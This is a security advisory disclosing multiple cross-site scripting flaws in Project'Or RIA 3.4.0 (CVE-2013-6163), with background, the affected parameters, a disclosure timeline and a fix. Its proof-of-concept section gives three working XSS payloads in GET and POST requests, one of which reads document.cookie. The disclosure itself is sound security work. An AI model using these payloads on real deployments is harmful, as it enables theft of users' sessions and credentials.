Project'Or RIA 3.4.0 Cross Site Scripting

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2013-018  
- Original release date: July 26th, 2013  
- Last revised: July 26th, 2013  
- Discovered by: Vicente Aguilera Diaz  
- Severity: 4.3/10 (CVSSv2 Base Scored)  
- CVE-ID: CVE-2013-6163  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Multiple XSS vulnerabilities in "Project'Or RIA".  
  
  
II. BACKGROUND  
-------------------------  
Project'Or RIA is an open source Project Management Software, trying to  
gather in a single tool every functionality needed to organize your  
projects.  
The objective is to keep it simple, easy to use on a day to day  
activity, while covering most of the project management functionalities.  
  
  
III. DESCRIPTION  
-------------------------  
Has been detected multiple XSS vulnerability.  
  
The affected resources and parameters are the following:  
  
Resource 1:  
/view/parameter.php  
  
Parameter:  
type  
  
Resource 2:  
/view/main.php  
  
Parameter:  
p1value  
  
Resource 3:  
/view/objectDetail.php  
  
Parameter:  
objectClass  
  
  
These vulnerabilities allows the execution of arbitrary HTML/script code  
to be executed in the context of the victim user's browser.  
  
  
IV. PROOF OF CONCEPT  
-------------------------  
A malicious user can inject arbitrary HTML/script code in the affected  
parameters.  
  
Example 1 (GET Request):  
http://<projectorria-server>/view/parameter.php?type="><H1><marquee>This+is+an+XSS+example<!--  
  
Example 2 (GET Request):  
http://<projectorria-server>/view/main.php?directAccessPage=parameter.php&menuActualStatus=visible&p1name=test&p1value=");alert(document.cookie);  
  
Example 3 (POST Request):  
POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1  
Host: <projectorria-server>  
  
objectClass=Affectation<H1><marquee>This+is+an+XSS+example<!--&objectId=42&listIdFilter=&listFilterClause=  
  
  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted  
user's browser, this can leverage to steal sensitive information as user  
credentials,  
  
personal data, etc.  
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Tested in Project'Or RIA v3.4.0  
  
  
VII. SOLUTION  
-------------------------  
Install new version.  
  
  
VIII. REFERENCES  
-------------------------  
http://projectorria.org  
http://www.isecauditors.com  
  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered  
by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).  
  
  
X. REVISION HISTORY  
-------------------------  
July 26, 2013: Initial release  
  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
July 25, 2013: Vulnerability acquired by  
Internet Security Auditors (www.isecauditors.com).  
September 26, 2013: Sent to project support.  
November 03, 2013: New release and disclosure.  
  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. Internet  
Security  
  
Auditors accepts no responsibility for any damage caused by the use or  
misuse of this information.  
  
  
XIII. ABOUT  
-------------------------  
Internet Security Auditors is a Spain based leader in web application  
testing, network security, penetration testing, security compliance  
implementation and  
  
assessing. Our clients include some of the largest companies in areas  
such as finance, telecommunications, insurance, ITC, etc. We are vendor  
independent  
  
provider with a deep expertise since 2001. Our efforts in R&D include  
vulnerability research, open security project collaboration and  
whitepapers,  
  
presentations and security events participation and promotion. For  
further information regarding our security services, contact us.  
`